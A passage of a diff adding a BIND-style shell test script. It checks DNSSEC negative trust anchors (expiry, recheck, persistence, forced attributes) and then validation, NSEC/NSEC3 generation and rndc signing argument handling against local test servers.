+grep "status: SERVFAIL" dig.out.ns4.test$n.1 > /dev/null || ret=1
+dig_with_opts badds.example. soa @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null || ret=1
+dig_with_opts a.secure.example.
a @10.53.0.4 > dig.out.ns4.test$n.3 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.3 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.3 > /dev/null || ret=1
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - checking initial state"; fi
+status=$((status+ret))
+ret=0
+
+#
+# add negative trust anchors
+#
+rndccmd 10.53.0.4 nta -f -l 20s bogus.example 2>&1 | sed 's/^/ns4 /' | cat_i
+rndccmd 10.53.0.4 nta badds.example 2>&1 | sed 's/^/ns4 /' | cat_i
+# reconfig should maintain NTAs
+rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1
+lines=$(wc -l < rndc.out.ns4.test$n.1)
+[ "$lines" -eq 2 ] || ret=1
+rndccmd 10.53.0.4 nta secure.example 2>&1 | sed 's/^/ns4 /' | cat_i
+rndccmd 10.53.0.4 nta fakenode.secure.example 2>&1 | sed 's/^/ns4 /' | cat_i
+# reload should maintain NTAs
+rndc_reload ns4 10.53.0.4
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.2
+lines=$(wc -l < rndc.out.ns4.test$n.2)
+[ "$lines" -eq 4 ] || ret=1
+# shellcheck disable=SC2016
+start=$($PERL -e 'print time()."\n";')
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - adding NTA's failed"; fi
+status=$((status+ret))
+ret=0
+
+#
+# check behavior with NTA's in place
+#
+dig_with_opts a.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.4 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.4 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.4 > /dev/null && ret=1
+dig_with_opts badds.example. soa @10.53.0.4 > dig.out.ns4.test$n.5 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.5 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.5 > /dev/null && ret=1
+dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.6 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.6 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.6 > /dev/null && ret=1
+dig_with_opts a.fakenode.secure.example.
a @10.53.0.4 > dig.out.ns4.test$n.7 || ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.7 > /dev/null && ret=1
+echo_i "dumping secroots"
+rndccmd 10.53.0.4 secroots | sed 's/^/ns4 /' | cat_i
+cp ns4/named.secroots named.secroots.test$n
+check_secroots_layout named.secroots.test$n || ret=1
+grep "bogus.example: expiry" named.secroots.test$n > /dev/null || ret=1
+grep "badds.example: expiry" named.secroots.test$n > /dev/null || ret=1
+grep "secure.example: expiry" named.secroots.test$n > /dev/null || ret=1
+grep "fakenode.secure.example: expiry" named.secroots.test$n > /dev/null || ret=1
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - with NTA's in place failed"; fi
+status=$((status+ret))
+ret=0
+
+echo_i "waiting for NTA rechecks/expirations"
+
+#
+# secure.example and badds.example used default nta-duration
+# (configured as 12s in ns4/named1.conf), but nta recheck interval
+# is configured to 9s, so at t=10 the NTAs for secure.example and
+# fakenode.secure.example should both be lifted, but badds.example
+# should still be going.
+#
+# shellcheck disable=SC2016
+$PERL -e 'my $delay = '"$start"' + 10 - time(); select(undef, undef, undef, $delay) if ($delay > 0);'
+dig_with_opts b.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.8 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.8 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.8 > /dev/null || ret=1
+dig_with_opts b.fakenode.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.9 || ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.9 > /dev/null || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n.9 > /dev/null || ret=1
+dig_with_opts badds.example.
soa @10.53.0.4 > dig.out.ns4.test$n.10 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.10 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.10 > /dev/null && ret=1
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - checking that default nta's were lifted due to recheck"; fi
+status=$((status+ret))
+ret=0
+
+#
+# bogus.example was set to expire in 20s, so at t=13
+# it should still be NTA'd, but badds.example used the default
+# lifetime of 12s, so it should revert to SERVFAIL now.
+#
+# shellcheck disable=SC2016
+$PERL -e 'my $delay = '"$start"' + 13 - time(); select(undef, undef, undef, $delay) if ($delay > 0);'
+# check nta table
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n._11
+lines=$(grep -c " expiry " rndc.out.ns4.test$n._11 || true)
+[ "$lines" -le 2 ] || ret=1
+grep "bogus.example/_default: expiry" rndc.out.ns4.test$n._11 > /dev/null || ret=1
+grep "badds.example/_default: expiry" rndc.out.ns4.test$n._11 > /dev/null && ret=1
+dig_with_opts b.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.11 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.11 > /dev/null && ret=1
+dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.12 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.12 > /dev/null || ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.12 > /dev/null && ret=1
+dig_with_opts c.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.13 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.13 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.13 > /dev/null || ret=1
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - checking that default nta's were lifted due to lifetime"; fi
+status=$((status+ret))
+ret=0
+
+#
+# at t=21, all the NTAs should have expired.
+#
+# shellcheck disable=SC2016
+$PERL -e 'my $delay = '"$start"' + 21 - time(); select(undef, undef, undef, $delay) if ($delay > 0);'
+# check correct behavior after bogus.example expiry
+dig_with_opts d.secure.example.
a @10.53.0.4 > dig.out.ns4.test$n.14 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.14 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.14 > /dev/null || ret=1
+dig_with_opts c.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.15 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.15 > /dev/null || ret=1
+# check nta table has been cleaned up now
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.3
+lines=$(grep -c " expiry " rndc.out.ns4.test$n.3 || true)
+[ "$lines" -eq 0 ] || ret=1
+n=$((n+1))
+if [ "$ret" -ne 0 ]; then echo_i "failed - checking that all nta's have been lifted"; fi
+status=$((status+ret))
+ret=0
+
+echo_i "testing NTA removals ($n)"
+rndccmd 10.53.0.4 nta badds.example 2>&1 | sed 's/^/ns4 /' | cat_i
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1
+grep "badds.example/_default: expiry" rndc.out.ns4.test$n.1 > /dev/null || ret=1
+dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.1 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.1 > /dev/null && ret=1
+grep "^a.badds.example." dig.out.ns4.test$n.1 > /dev/null || ret=1
+rndccmd 10.53.0.4 nta -remove badds.example > rndc.out.ns4.test$n.2
+grep "Negative trust anchor removed: badds.example/_default" rndc.out.ns4.test$n.2 > /dev/null || ret=1
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.3
+grep "badds.example/_default: expiry" rndc.out.ns4.test$n.3 > /dev/null && ret=1
+dig_with_opts a.badds.example.
a @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+ret=0
+
+echo_i "remove non-existent NTA three times"
+rndccmd 10.53.0.4 nta -r foo > rndc.out.ns4.test$n.4 2>&1
+rndccmd 10.53.0.4 nta -remove foo > rndc.out.ns4.test$n.5 2>&1
+rndccmd 10.53.0.4 nta -r foo > rndc.out.ns4.test$n.6 2>&1
+grep "not found" rndc.out.ns4.test$n.6 > /dev/null || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+ret=0
+
+n=$((n+1))
+echo_i "testing NTA with bogus lifetimes ($n)"
+echo_i "check with no nta lifetime specified"
+rndccmd 10.53.0.4 nta -l "" foo > rndc.out.ns4.test$n.1 2>&1 || true
+grep "'nta' failed: bad ttl" rndc.out.ns4.test$n.1 > /dev/null || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+ret=0
+
+echo_i "check with bad nta lifetime"
+rndccmd 10.53.0.4 nta -l garbage foo > rndc.out.ns4.test$n.2 2>&1 || true
+grep "'nta' failed: bad ttl" rndc.out.ns4.test$n.2 > /dev/null || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+ret=0
+
+echo_i "check with too long nta lifetime"
+rndccmd 10.53.0.4 nta -l 7d1h foo > rndc.out.ns4.test$n.3 2>&1 || true
+grep "'nta' failed: out of range" rndc.out.ns4.test$n.3 > /dev/null || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+ret=0
+
+#
+# check NTA persistence across restarts
+#
+n=$((n+1))
+echo_i "testing NTA persistence across restarts ($n)"
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1
+lines=$(grep -c " expiry " rndc.out.ns4.test$n.1 || true)
+[ "$lines" -eq 0 ] || ret=1
+rndccmd 10.53.0.4 nta -f -l 30s bogus.example 2>&1 | sed 's/^/ns4 /' | cat_i
+rndccmd 10.53.0.4 nta -f -l 10s badds.example 2>&1 | sed 's/^/ns4 /' | cat_i
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.2
+lines=$(grep -c " expiry " rndc.out.ns4.test$n.2 || true)
+[ "$lines" -eq 2 ] || ret=1
+# shellcheck disable=SC2016
+start=$($PERL -e 'print time()."\n";')
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: adding NTA's failed"; fi
+status=$((status+ret))
+ret=0
+
+echo_i "killing ns4 with SIGTERM"
+$KILL -TERM "$(cat ns4/named.pid)"
+rm -f ns4/named.pid
+
+#
+# ns4 has now shutdown. wait until t=14 when badds.example's NTA
+# (lifetime=10s) would have expired, and then restart ns4.
+#
+echo_i "waiting till 14s have passed since NTAs were added before restarting ns4"
+# shellcheck disable=SC2016
+$PERL -e 'my $delay = '"$start"' + 14 - time(); select(undef, undef, undef, $delay) if ($delay > 0);'
+
+if
+ start_server --noclean --restart --port "$PORT" ns4
+then
+ echo_i "restarted server ns4"
+else
+ echo_i "could not restart server ns4"
+ exit 1
+fi
+
+echo_i "sleeping for an additional 4 seconds for ns4 to fully startup"
+sleep 4
+
+#
+# ns4 should be back up now. The NTA for bogus.example should still be
+# valid, whereas badds.example should not have been added during named
+# startup (as it had already expired), the fact that it's ignored should
+# be logged.
+#
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.3
+lines=$(wc -l < rndc.out.ns4.test$n.3)
+[ "$lines" -eq 1 ] || ret=1
+grep "bogus.example/_default: expiry" rndc.out.ns4.test$n.3 > /dev/null || ret=1
+dig_with_opts b.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.4 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.4 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.4 > /dev/null && ret=1
+dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.5 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.5 > /dev/null || ret=1
+grep "ignoring expired NTA at badds.example" ns4/named.run > /dev/null || ret=1
+
+# cleanup
+rndccmd 10.53.0.4 nta -remove bogus.example > rndc.out.ns4.test$n.6
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: restoring NTA failed"; fi
+status=$((status+ret))
+ret=0
+
+#
+# check "regular" attribute in NTA file works as expected at named
+# startup.
+#
+n=$((n+1))
+echo_i "testing loading regular attribute from NTA file ($n)"
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 2>/dev/null
+lines=$(wc -l < rndc.out.ns4.test$n.1)
+[ "$lines" -eq 0 ] || ret=1
+# initially, secure.example. validates with AD=1
+dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.2 > /dev/null || ret=1
+
+echo_i "killing ns4 with SIGTERM"
+$KILL -TERM "$(cat ns4/named.pid)"
+rm -f ns4/named.pid
+
+echo_i "sleeping for an additional 4 seconds for ns4 to fully shutdown"
+sleep 4
+
+#
+# ns4 has now shutdown. add NTA for secure.example. directly into the
+# _default.nta file with the regular attribute and some future timestamp.
+#
+future="$(($(date +%Y)+20))0101010000"
+echo "secure.example. regular $future" > ns4/_default.nta
+# shellcheck disable=SC2016
+start=$($PERL -e 'print time()."\n";')
+
+if
+ start_server --noclean --restart --port "$PORT" ns4
+then
+ echo_i "restarted server ns4"
+else
+ echo_i "could not restart server ns4"
+ exit 1
+fi
+
+# nta-recheck is configured as 9s, so at t=12 the NTAs for
+# secure.example. should be lifted as it is not a forced NTA.
+echo_i "waiting till 12s have passed after ns4 was restarted"
+# shellcheck disable=SC2016
+$PERL -e 'my $delay = '"$start"' + 12 - time(); select(undef, undef, undef, $delay) if ($delay > 0);'
+
+# secure.example. should now return an AD=1 answer (still validates) as
+# the NTA has been lifted.
+dig_with_opts a.secure.example.
a @10.53.0.4 > dig.out.ns4.test$n.3 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.3 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.3 > /dev/null || ret=1
+
+# cleanup
+rndccmd 10.53.0.4 nta -remove secure.example > rndc.out.ns4.test$n.4 2>/dev/null
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: loading regular NTAs failed"; fi
+status=$((status+ret))
+ret=0
+
+#
+# check "forced" attribute in NTA file works as expected at named
+# startup.
+#
+n=$((n+1))
+echo_i "testing loading forced attribute from NTA file ($n)"
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 2>/dev/null
+lines=$(wc -l < rndc.out.ns4.test$n.1)
+[ "$lines" -eq 0 ] || ret=1
+# initially, secure.example. validates with AD=1
+dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.2 > /dev/null || ret=1
+
+echo_i "killing ns4 with SIGTERM"
+$KILL -TERM "$(cat ns4/named.pid)"
+rm -f named.pid
+
+echo_i "sleeping for an additional 4 seconds for ns4 to fully shutdown"
+sleep 4
+
+#
+# ns4 has now shutdown. add NTA for secure.example. directly into the
+# _default.nta file with the forced attribute and some future timestamp.
+#
+echo "secure.example. forced $future" > ns4/_default.nta
+start=$($PERL -e 'print time()."\n";')
+
+if
+ start_server --noclean --restart --port "$PORT" ns4
+then
+ echo_i "restarted server ns4"
+else
+ echo_i "could not restart server ns4"
+ exit 1
+fi
+
+# nta-recheck is configured as 9s, but even at t=12 the NTAs for
+# secure.example. should not be lifted as it is a forced NTA.
+echo_i "waiting till 12s have passed after ns4 was restarted"
+# shellcheck disable=SC2016
+$PERL -e 'my $delay = '"$start"' + 12 - time(); select(undef, undef, undef, $delay) if ($delay > 0);'
+
+# secure.example. should now return an AD=0 answer (non-authenticated)
+# as the NTA is still there.
+dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.3 || ret=1
+grep "status: SERVFAIL" dig.out.ns4.test$n.3 > /dev/null && ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.3 > /dev/null && ret=1
+
+# cleanup
+rndccmd 10.53.0.4 nta -remove secure.example > rndc.out.ns4.test$n.4 2>/dev/null
+
+if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: loading forced NTAs failed"; fi
+status=$((status+ret))
+ret=0
+
+#
+# check that NTA lifetime read from file is clamped to 1 week.
+#
+n=$((n+1))
+echo_i "testing loading out of bounds lifetime from NTA file ($n)"
+
+echo_i "killing ns4 with SIGTERM"
+$KILL -TERM "$(cat ns4/named.pid)"
+rm -f ns4/named.pid
+
+echo_i "sleeping for an additional 4 seconds for ns4 to fully shutdown"
+sleep 4
+
+#
+# ns4 has now shutdown. add NTA for secure.example. directly into the
+# _default.nta file with a lifetime well into the future.
+#
+echo "secure.example. forced $future" > ns4/_default.nta
+added=$($PERL -e 'print time()."\n";')
+
+if
+ start_server --noclean --restart --port "$PORT" ns4
+then
+ echo_i "restarted server ns4"
+else
+ echo_i "could not restart server ns4"
+ exit 1
+fi
+
+echo_i "sleeping for an additional 4 seconds for ns4 to fully startup"
+sleep 4
+
+# dump the NTA to a file (omit validate-except entries)
+echo_i "testing 'rndc nta'"
+rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 2>/dev/null
+# "corp" is configured as a validate-except domain and thus should be
+# omitted. only "secure.example" should be in the dump at this point.
+lines=$(wc -l < rndc.out.ns4.test$n.1)
+[ "$lines" -eq 1 ] || ret=1
+grep 'secure.example' rndc.out.ns4.test$n.1 > /dev/null || ret=1
+ts=$(awk '{print $3" "$4}' < rndc.out.ns4.test$n.1)
+# rndc nta outputs localtime, so append the timezone
+ts_with_zone="$ts $(date +%z)"
+echo "ts=$ts" > rndc.out.ns4.test$n.2
+echo "ts_with_zone=$ts_with_zone" >> rndc.out.ns4.test$n.2
+echo "added=$added" >> rndc.out.ns4.test$n.2
+if $PERL -e 'use Time::Piece; use Time::Seconds;' 2>/dev/null
+then
+ # ntadiff.pl computes $ts_with_zone - ($added + 1week)
+ d=$($PERL ./ntadiff.pl "$ts_with_zone" "$added")
+ echo "d=$d" >> rndc.out.ns4.test$n.2
+ # diff from $added(now) + 1week to the clamped NTA lifetime should be
+ # less than a few seconds (handle daylight saving changes by adding 3600).
+ [ "$d" -lt 3610 ] || ret=1
+else
+ echo_i "skipped ntadiff test; install PERL module Time::Piece"
+fi
+
+# cleanup
+rndccmd 10.53.0.4 nta -remove secure.example > rndc.out.ns4.test$n.3 2>/dev/null
+
+n=$((n+1))
+if [ "$ret" -ne 0 ]; then echo_i "failed - NTA lifetime clamping failed"; fi
+status=$((status+ret))
+
+echo_i "checking that NTAs work with 'forward only;' to a validating resolver ($n)"
+ret=0
+# Sanity check behavior without an NTA in place.
+dig_with_opts @10.53.0.9 badds.example. SOA > dig.out.ns9.test$n.1 || ret=1
+grep "SERVFAIL" dig.out.ns9.test$n.1 > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns9.test$n.1 > /dev/null || ret=1
+grep "flags:[^;]* ad[ ;].*QUERY" dig.out.ns9.test$n.1 > /dev/null && ret=1
+# Add an NTA, expecting that to cause resolution to succeed.
+rndccmd 10.53.0.9 nta badds.example > rndc.out.ns9.test$n.1 2>&1 || ret=1
+dig_with_opts @10.53.0.9 badds.example. SOA > dig.out.ns9.test$n.2 || ret=1
+grep "NOERROR" dig.out.ns9.test$n.2 > /dev/null || ret=1
+grep "ANSWER: 2" dig.out.ns9.test$n.2 > /dev/null || ret=1
+grep "flags:[^;]* ad[ ;].*QUERY" dig.out.ns9.test$n.2 > /dev/null && ret=1
+# Remove the NTA, expecting that to cause resolution to fail again.
+rndccmd 10.53.0.9 nta -remove badds.example > rndc.out.ns9.test$n.2 2>&1 || ret=1
+dig_with_opts @10.53.0.9 badds.example. SOA > dig.out.ns9.test$n.3 || ret=1
+grep "SERVFAIL" dig.out.ns9.test$n.3 > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns9.test$n.3 > /dev/null || ret=1
+grep "flags:[^;]* ad[ ;].*QUERY" dig.out.ns9.test$n.3 > /dev/null && ret=1
+if [ "$ret" -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "completed NTA tests"
+
+# Run a minimal update test if possible. This is really just
+# a regression test for RT #2399; more tests should be added.
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ echo_i "running DNSSEC update test"
+ ret=0
+ output=$($PERL dnssec_update_test.pl -s 10.53.0.3 -p "$PORT" dynamic.example.)
+ test "$?" -eq 0 || ret=1
+ echo "$output" | cat_i
+ [ $ret -eq 1 ] && status=1
+else
+ echo_i "The DNSSEC update test requires the Net::DNS library." >&2
+fi
+
+n=$((n+1))
+echo_i "checking managed key maintenance has not started yet ($n)"
+ret=0
+[ -f "ns4/managed-keys.bind.jnl" ] && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Reconfigure caching server to use "dnssec-validation auto", and repeat
+# some of the DNSSEC validation tests to ensure that it works correctly.
+# Also setup a placeholder managed-keys zone to check if named can process it
+# correctly.
+echo_i "switching to automatic root key configuration"
+cp ns4/managed-keys.bind.in ns4/managed-keys.bind
+copy_setports ns4/named2.conf.in ns4/named.conf
+rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i
+sleep 5
+
+echo_i "checking managed key maintenance timer has now started ($n)"
+ret=0
+[ -f "ns4/managed-keys.bind.jnl" ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive validation NSEC ($n)"
+ret=0
+dig_with_opts +noauth a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth a.example.
@10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive validation NSEC3 ($n)"
+ret=0
+dig_with_opts +noauth a.nsec3.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth a.nsec3.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive validation OPTOUT ($n)"
+ret=0
+dig_with_opts +noauth a.optout.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth a.optout.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking negative validation ($n)"
+ret=0
+dig_with_opts +noauth q.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth q.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that root DS queries validate ($n)"
+ret=0
+dig_with_opts +noauth . @10.53.0.1 ds > dig.out.ns1.test$n || ret=1
+dig_with_opts +noauth .
@10.53.0.4 ds > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns1.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that DS at a RFC 1918 empty zone lookup succeeds ($n)"
+ret=0
+dig_with_opts +noauth 10.in-addr.arpa ds @10.53.0.2 >dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth 10.in-addr.arpa ds @10.53.0.4 >dig.out.ns6.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns6.test$n || ret=1
+grep "status: NOERROR" dig.out.ns6.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking expired signatures remain with "'"allow-update { none; };"'" and no keys available ($n)"
+ret=0
+dig_with_opts +noauth expired.example. +dnssec @10.53.0.3 soa > dig.out.ns3.test$n || ret=1
+grep "RRSIG.SOA" dig.out.ns3.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+
+status=$((status+ret))
+echo_i "checking expired signatures do not validate ($n)"
+ret=0
+dig_with_opts +noauth expired.example. +dnssec @10.53.0.4 soa > dig.out.ns4.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+grep "expired.example/.*: RRSIG has expired" ns4/named.run > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that the NSEC3 record for the apex is properly signed when a DNSKEY is added via UPDATE ($n)"
+ret=0
+(
+cd ns3 || exit 1
+kskname=$($KEYGEN -q -3 -a $DEFAULT_ALGORITHM -fk update-nsec3.example)
+(
+echo zone update-nsec3.example
+echo server 10.53.0.3 "$PORT"
+grep DNSKEY "${kskname}.key" | sed -e 's/^/update add /' -e 's/IN/300 IN/'
+echo send
+) | $NSUPDATE
+)
+dig_with_opts +dnssec a update-nsec3.example.
@10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1
+grep "NSEC3 .* TYPE65534" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that the NSEC record is properly generated when DNSKEY are added via auto-dnssec ($n)"
+ret=0
+dig_with_opts +dnssec a auto-nsec.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1
+grep "IN.NSEC[^3].* DNSKEY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that the NSEC3 record is properly generated when DNSKEY are added via auto-dnssec ($n)"
+ret=0
+dig_with_opts +dnssec a auto-nsec3.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1
+grep "IN.NSEC3 .* DNSKEY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that signing records have been marked as complete ($n)"
+ret=0
+checkprivate dynamic.example 10.53.0.3 || ret=1
+checkprivate update-nsec3.example 10.53.0.3 || ret=1
+checkprivate auto-nsec3.example 10.53.0.3 || ret=1
+checkprivate expiring.example 10.53.0.3 || ret=1
+checkprivate auto-nsec.example 10.53.0.3 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing' without arguments is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -list' without zone is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -list > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -clear' without additional arguments is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -clear > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -clear all' without zone is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -clear all > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
